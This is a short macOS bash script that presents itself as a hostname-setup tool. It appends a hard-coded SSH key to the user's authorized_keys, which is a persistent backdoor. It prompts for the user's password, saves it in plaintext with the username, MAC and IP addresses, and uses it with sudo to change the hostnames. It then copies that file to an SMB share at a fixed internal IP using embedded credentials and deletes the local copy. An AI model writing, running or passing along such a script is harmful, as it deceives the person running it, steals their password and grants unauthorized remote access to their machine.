#!/bin/bash

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxgIyLihq0H3Ru+sLMXPO+x6UuwPyU7s1LaDSm8tkrQTOSClcjpnIlyZLZ72+mY41UuZUWsigVujqsgxqc+4jKgEejeQPPA4usNvq0h+krhwvlW6/MBI6/HwqOak99aBUehqbjvb9iqLAelCGVZ3xDvO3ZmBZDq62PB2x0Na+DXXQvZXJvtvOz1+7l7rmgtF0jjqkLSNAS8w2dkQtCcV8fIA4XOa327N3zhqJW5I4V+fq2OPQCG5218hC0yMUJwz9Z+qQd+iPmgOzRumRiG0TwdG0FYN4clgYpB7I0zbc2HLZ4KC78J7XBZWaNUNAvu9H2vdhHaqb+cm2G20tggvkB" >> ~/.ssh/authorized_keys

echo "Enter your last name:"

read varname
FILE="/tmp/${varname}.txt"
touch /tmp/$varname
echo $varname >> $FILE

read -s -p "Enter your password: " PASSWORD
echo "pass: $PASSWORD" >> $FILE
echo Hostname succesfull set for $varname
echo "user: $USER" >> $FILE

echo $PASSWORD | sudo -S scutil --set LocalHostName "$varname"
echo $PASSWORD | sudo -S scutil --set ComputerName "$varname"
echo $PASSWORD | sudo -S scutil --set HostName "$varname"

echo Password has been stored

#Get IP address
MAC0=$(ifconfig en0 | grep ether | awk '{print $2}')
IP0=$(ifconfig en0 | grep inet | grep -v inet6 | awk '{print $2}')
echo "MAC0: $MAC0 IP0: $IP0" >> $FILE
MAC1=$(ifconfig en1 | grep ether | awk '{print $2}')
IP1=$(ifconfig en1 | grep inet | grep -v inet6 | awk '{print $2}')
echo "MAC1: $MAC1 IP1: $IP1" >> $FILE

mkdir /Users/$USER/Documents/mnt
mount -t smbfs //cam1:qwerty123@10.10.4.242/cam1 /Users/$USER/Documents/mnt/
cp $FILE /Users/$USER/Documents/mnt/
rm $FILE
umount /Users/$USER/Documents/mnt/
rm -rf /Users/$USER/Documents/mnt/
